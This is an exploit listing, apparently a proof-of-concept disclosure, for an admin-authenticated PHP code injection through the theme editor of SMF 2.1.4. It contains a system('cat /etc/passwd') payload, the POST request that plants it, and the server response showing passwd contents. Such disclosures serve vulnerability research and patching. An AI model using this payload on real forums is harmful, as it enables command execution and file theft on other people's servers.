Share
## https://sploitus.com/exploit?id=PACKETSTORM:180255
# Exploit Title: Authenticated Code Injection - smfv2.1.4  
# Date: 8/2024  
# Exploit Author: Andrey Stoykov  
# Version: 2.1.4  
# Tested on: Ubuntu 22.04  
# Blog:  
https://msecureltd.blogspot.com/2024/06/friday-fun-pentest-series-7-smfv214.html  
  
Code Injection Authenticated:  
  
Steps to Reproduce:  
  
1. Login as admin  
2. Browse to "Current Theme"  
3. Click on "Modify Themes" > "SMF Default Theme"  
4. Click on Admin.template.php  
5. In the first box enter the PHP payload "<?php system('cat /etc/passwd')  
?>"  
  
  
// HTTP POST request showing the code injection payload  
  
POST /SMFdbwci7dy0o/index.php?action=admin;area=theme;th=1;sa=edit HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
[...]  
  
entire_file[]=<?php+system('cat /etc/passwd') ?>[...]  
  
  
// HTTP response showing /etc/passwd contents  
  
HTTP/1.1 200 OK  
Server: Apache  
Pragma: no-cache  
[...]  
  
[...]  
root:x:0:0:root:/root:/bin/bash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  
[...]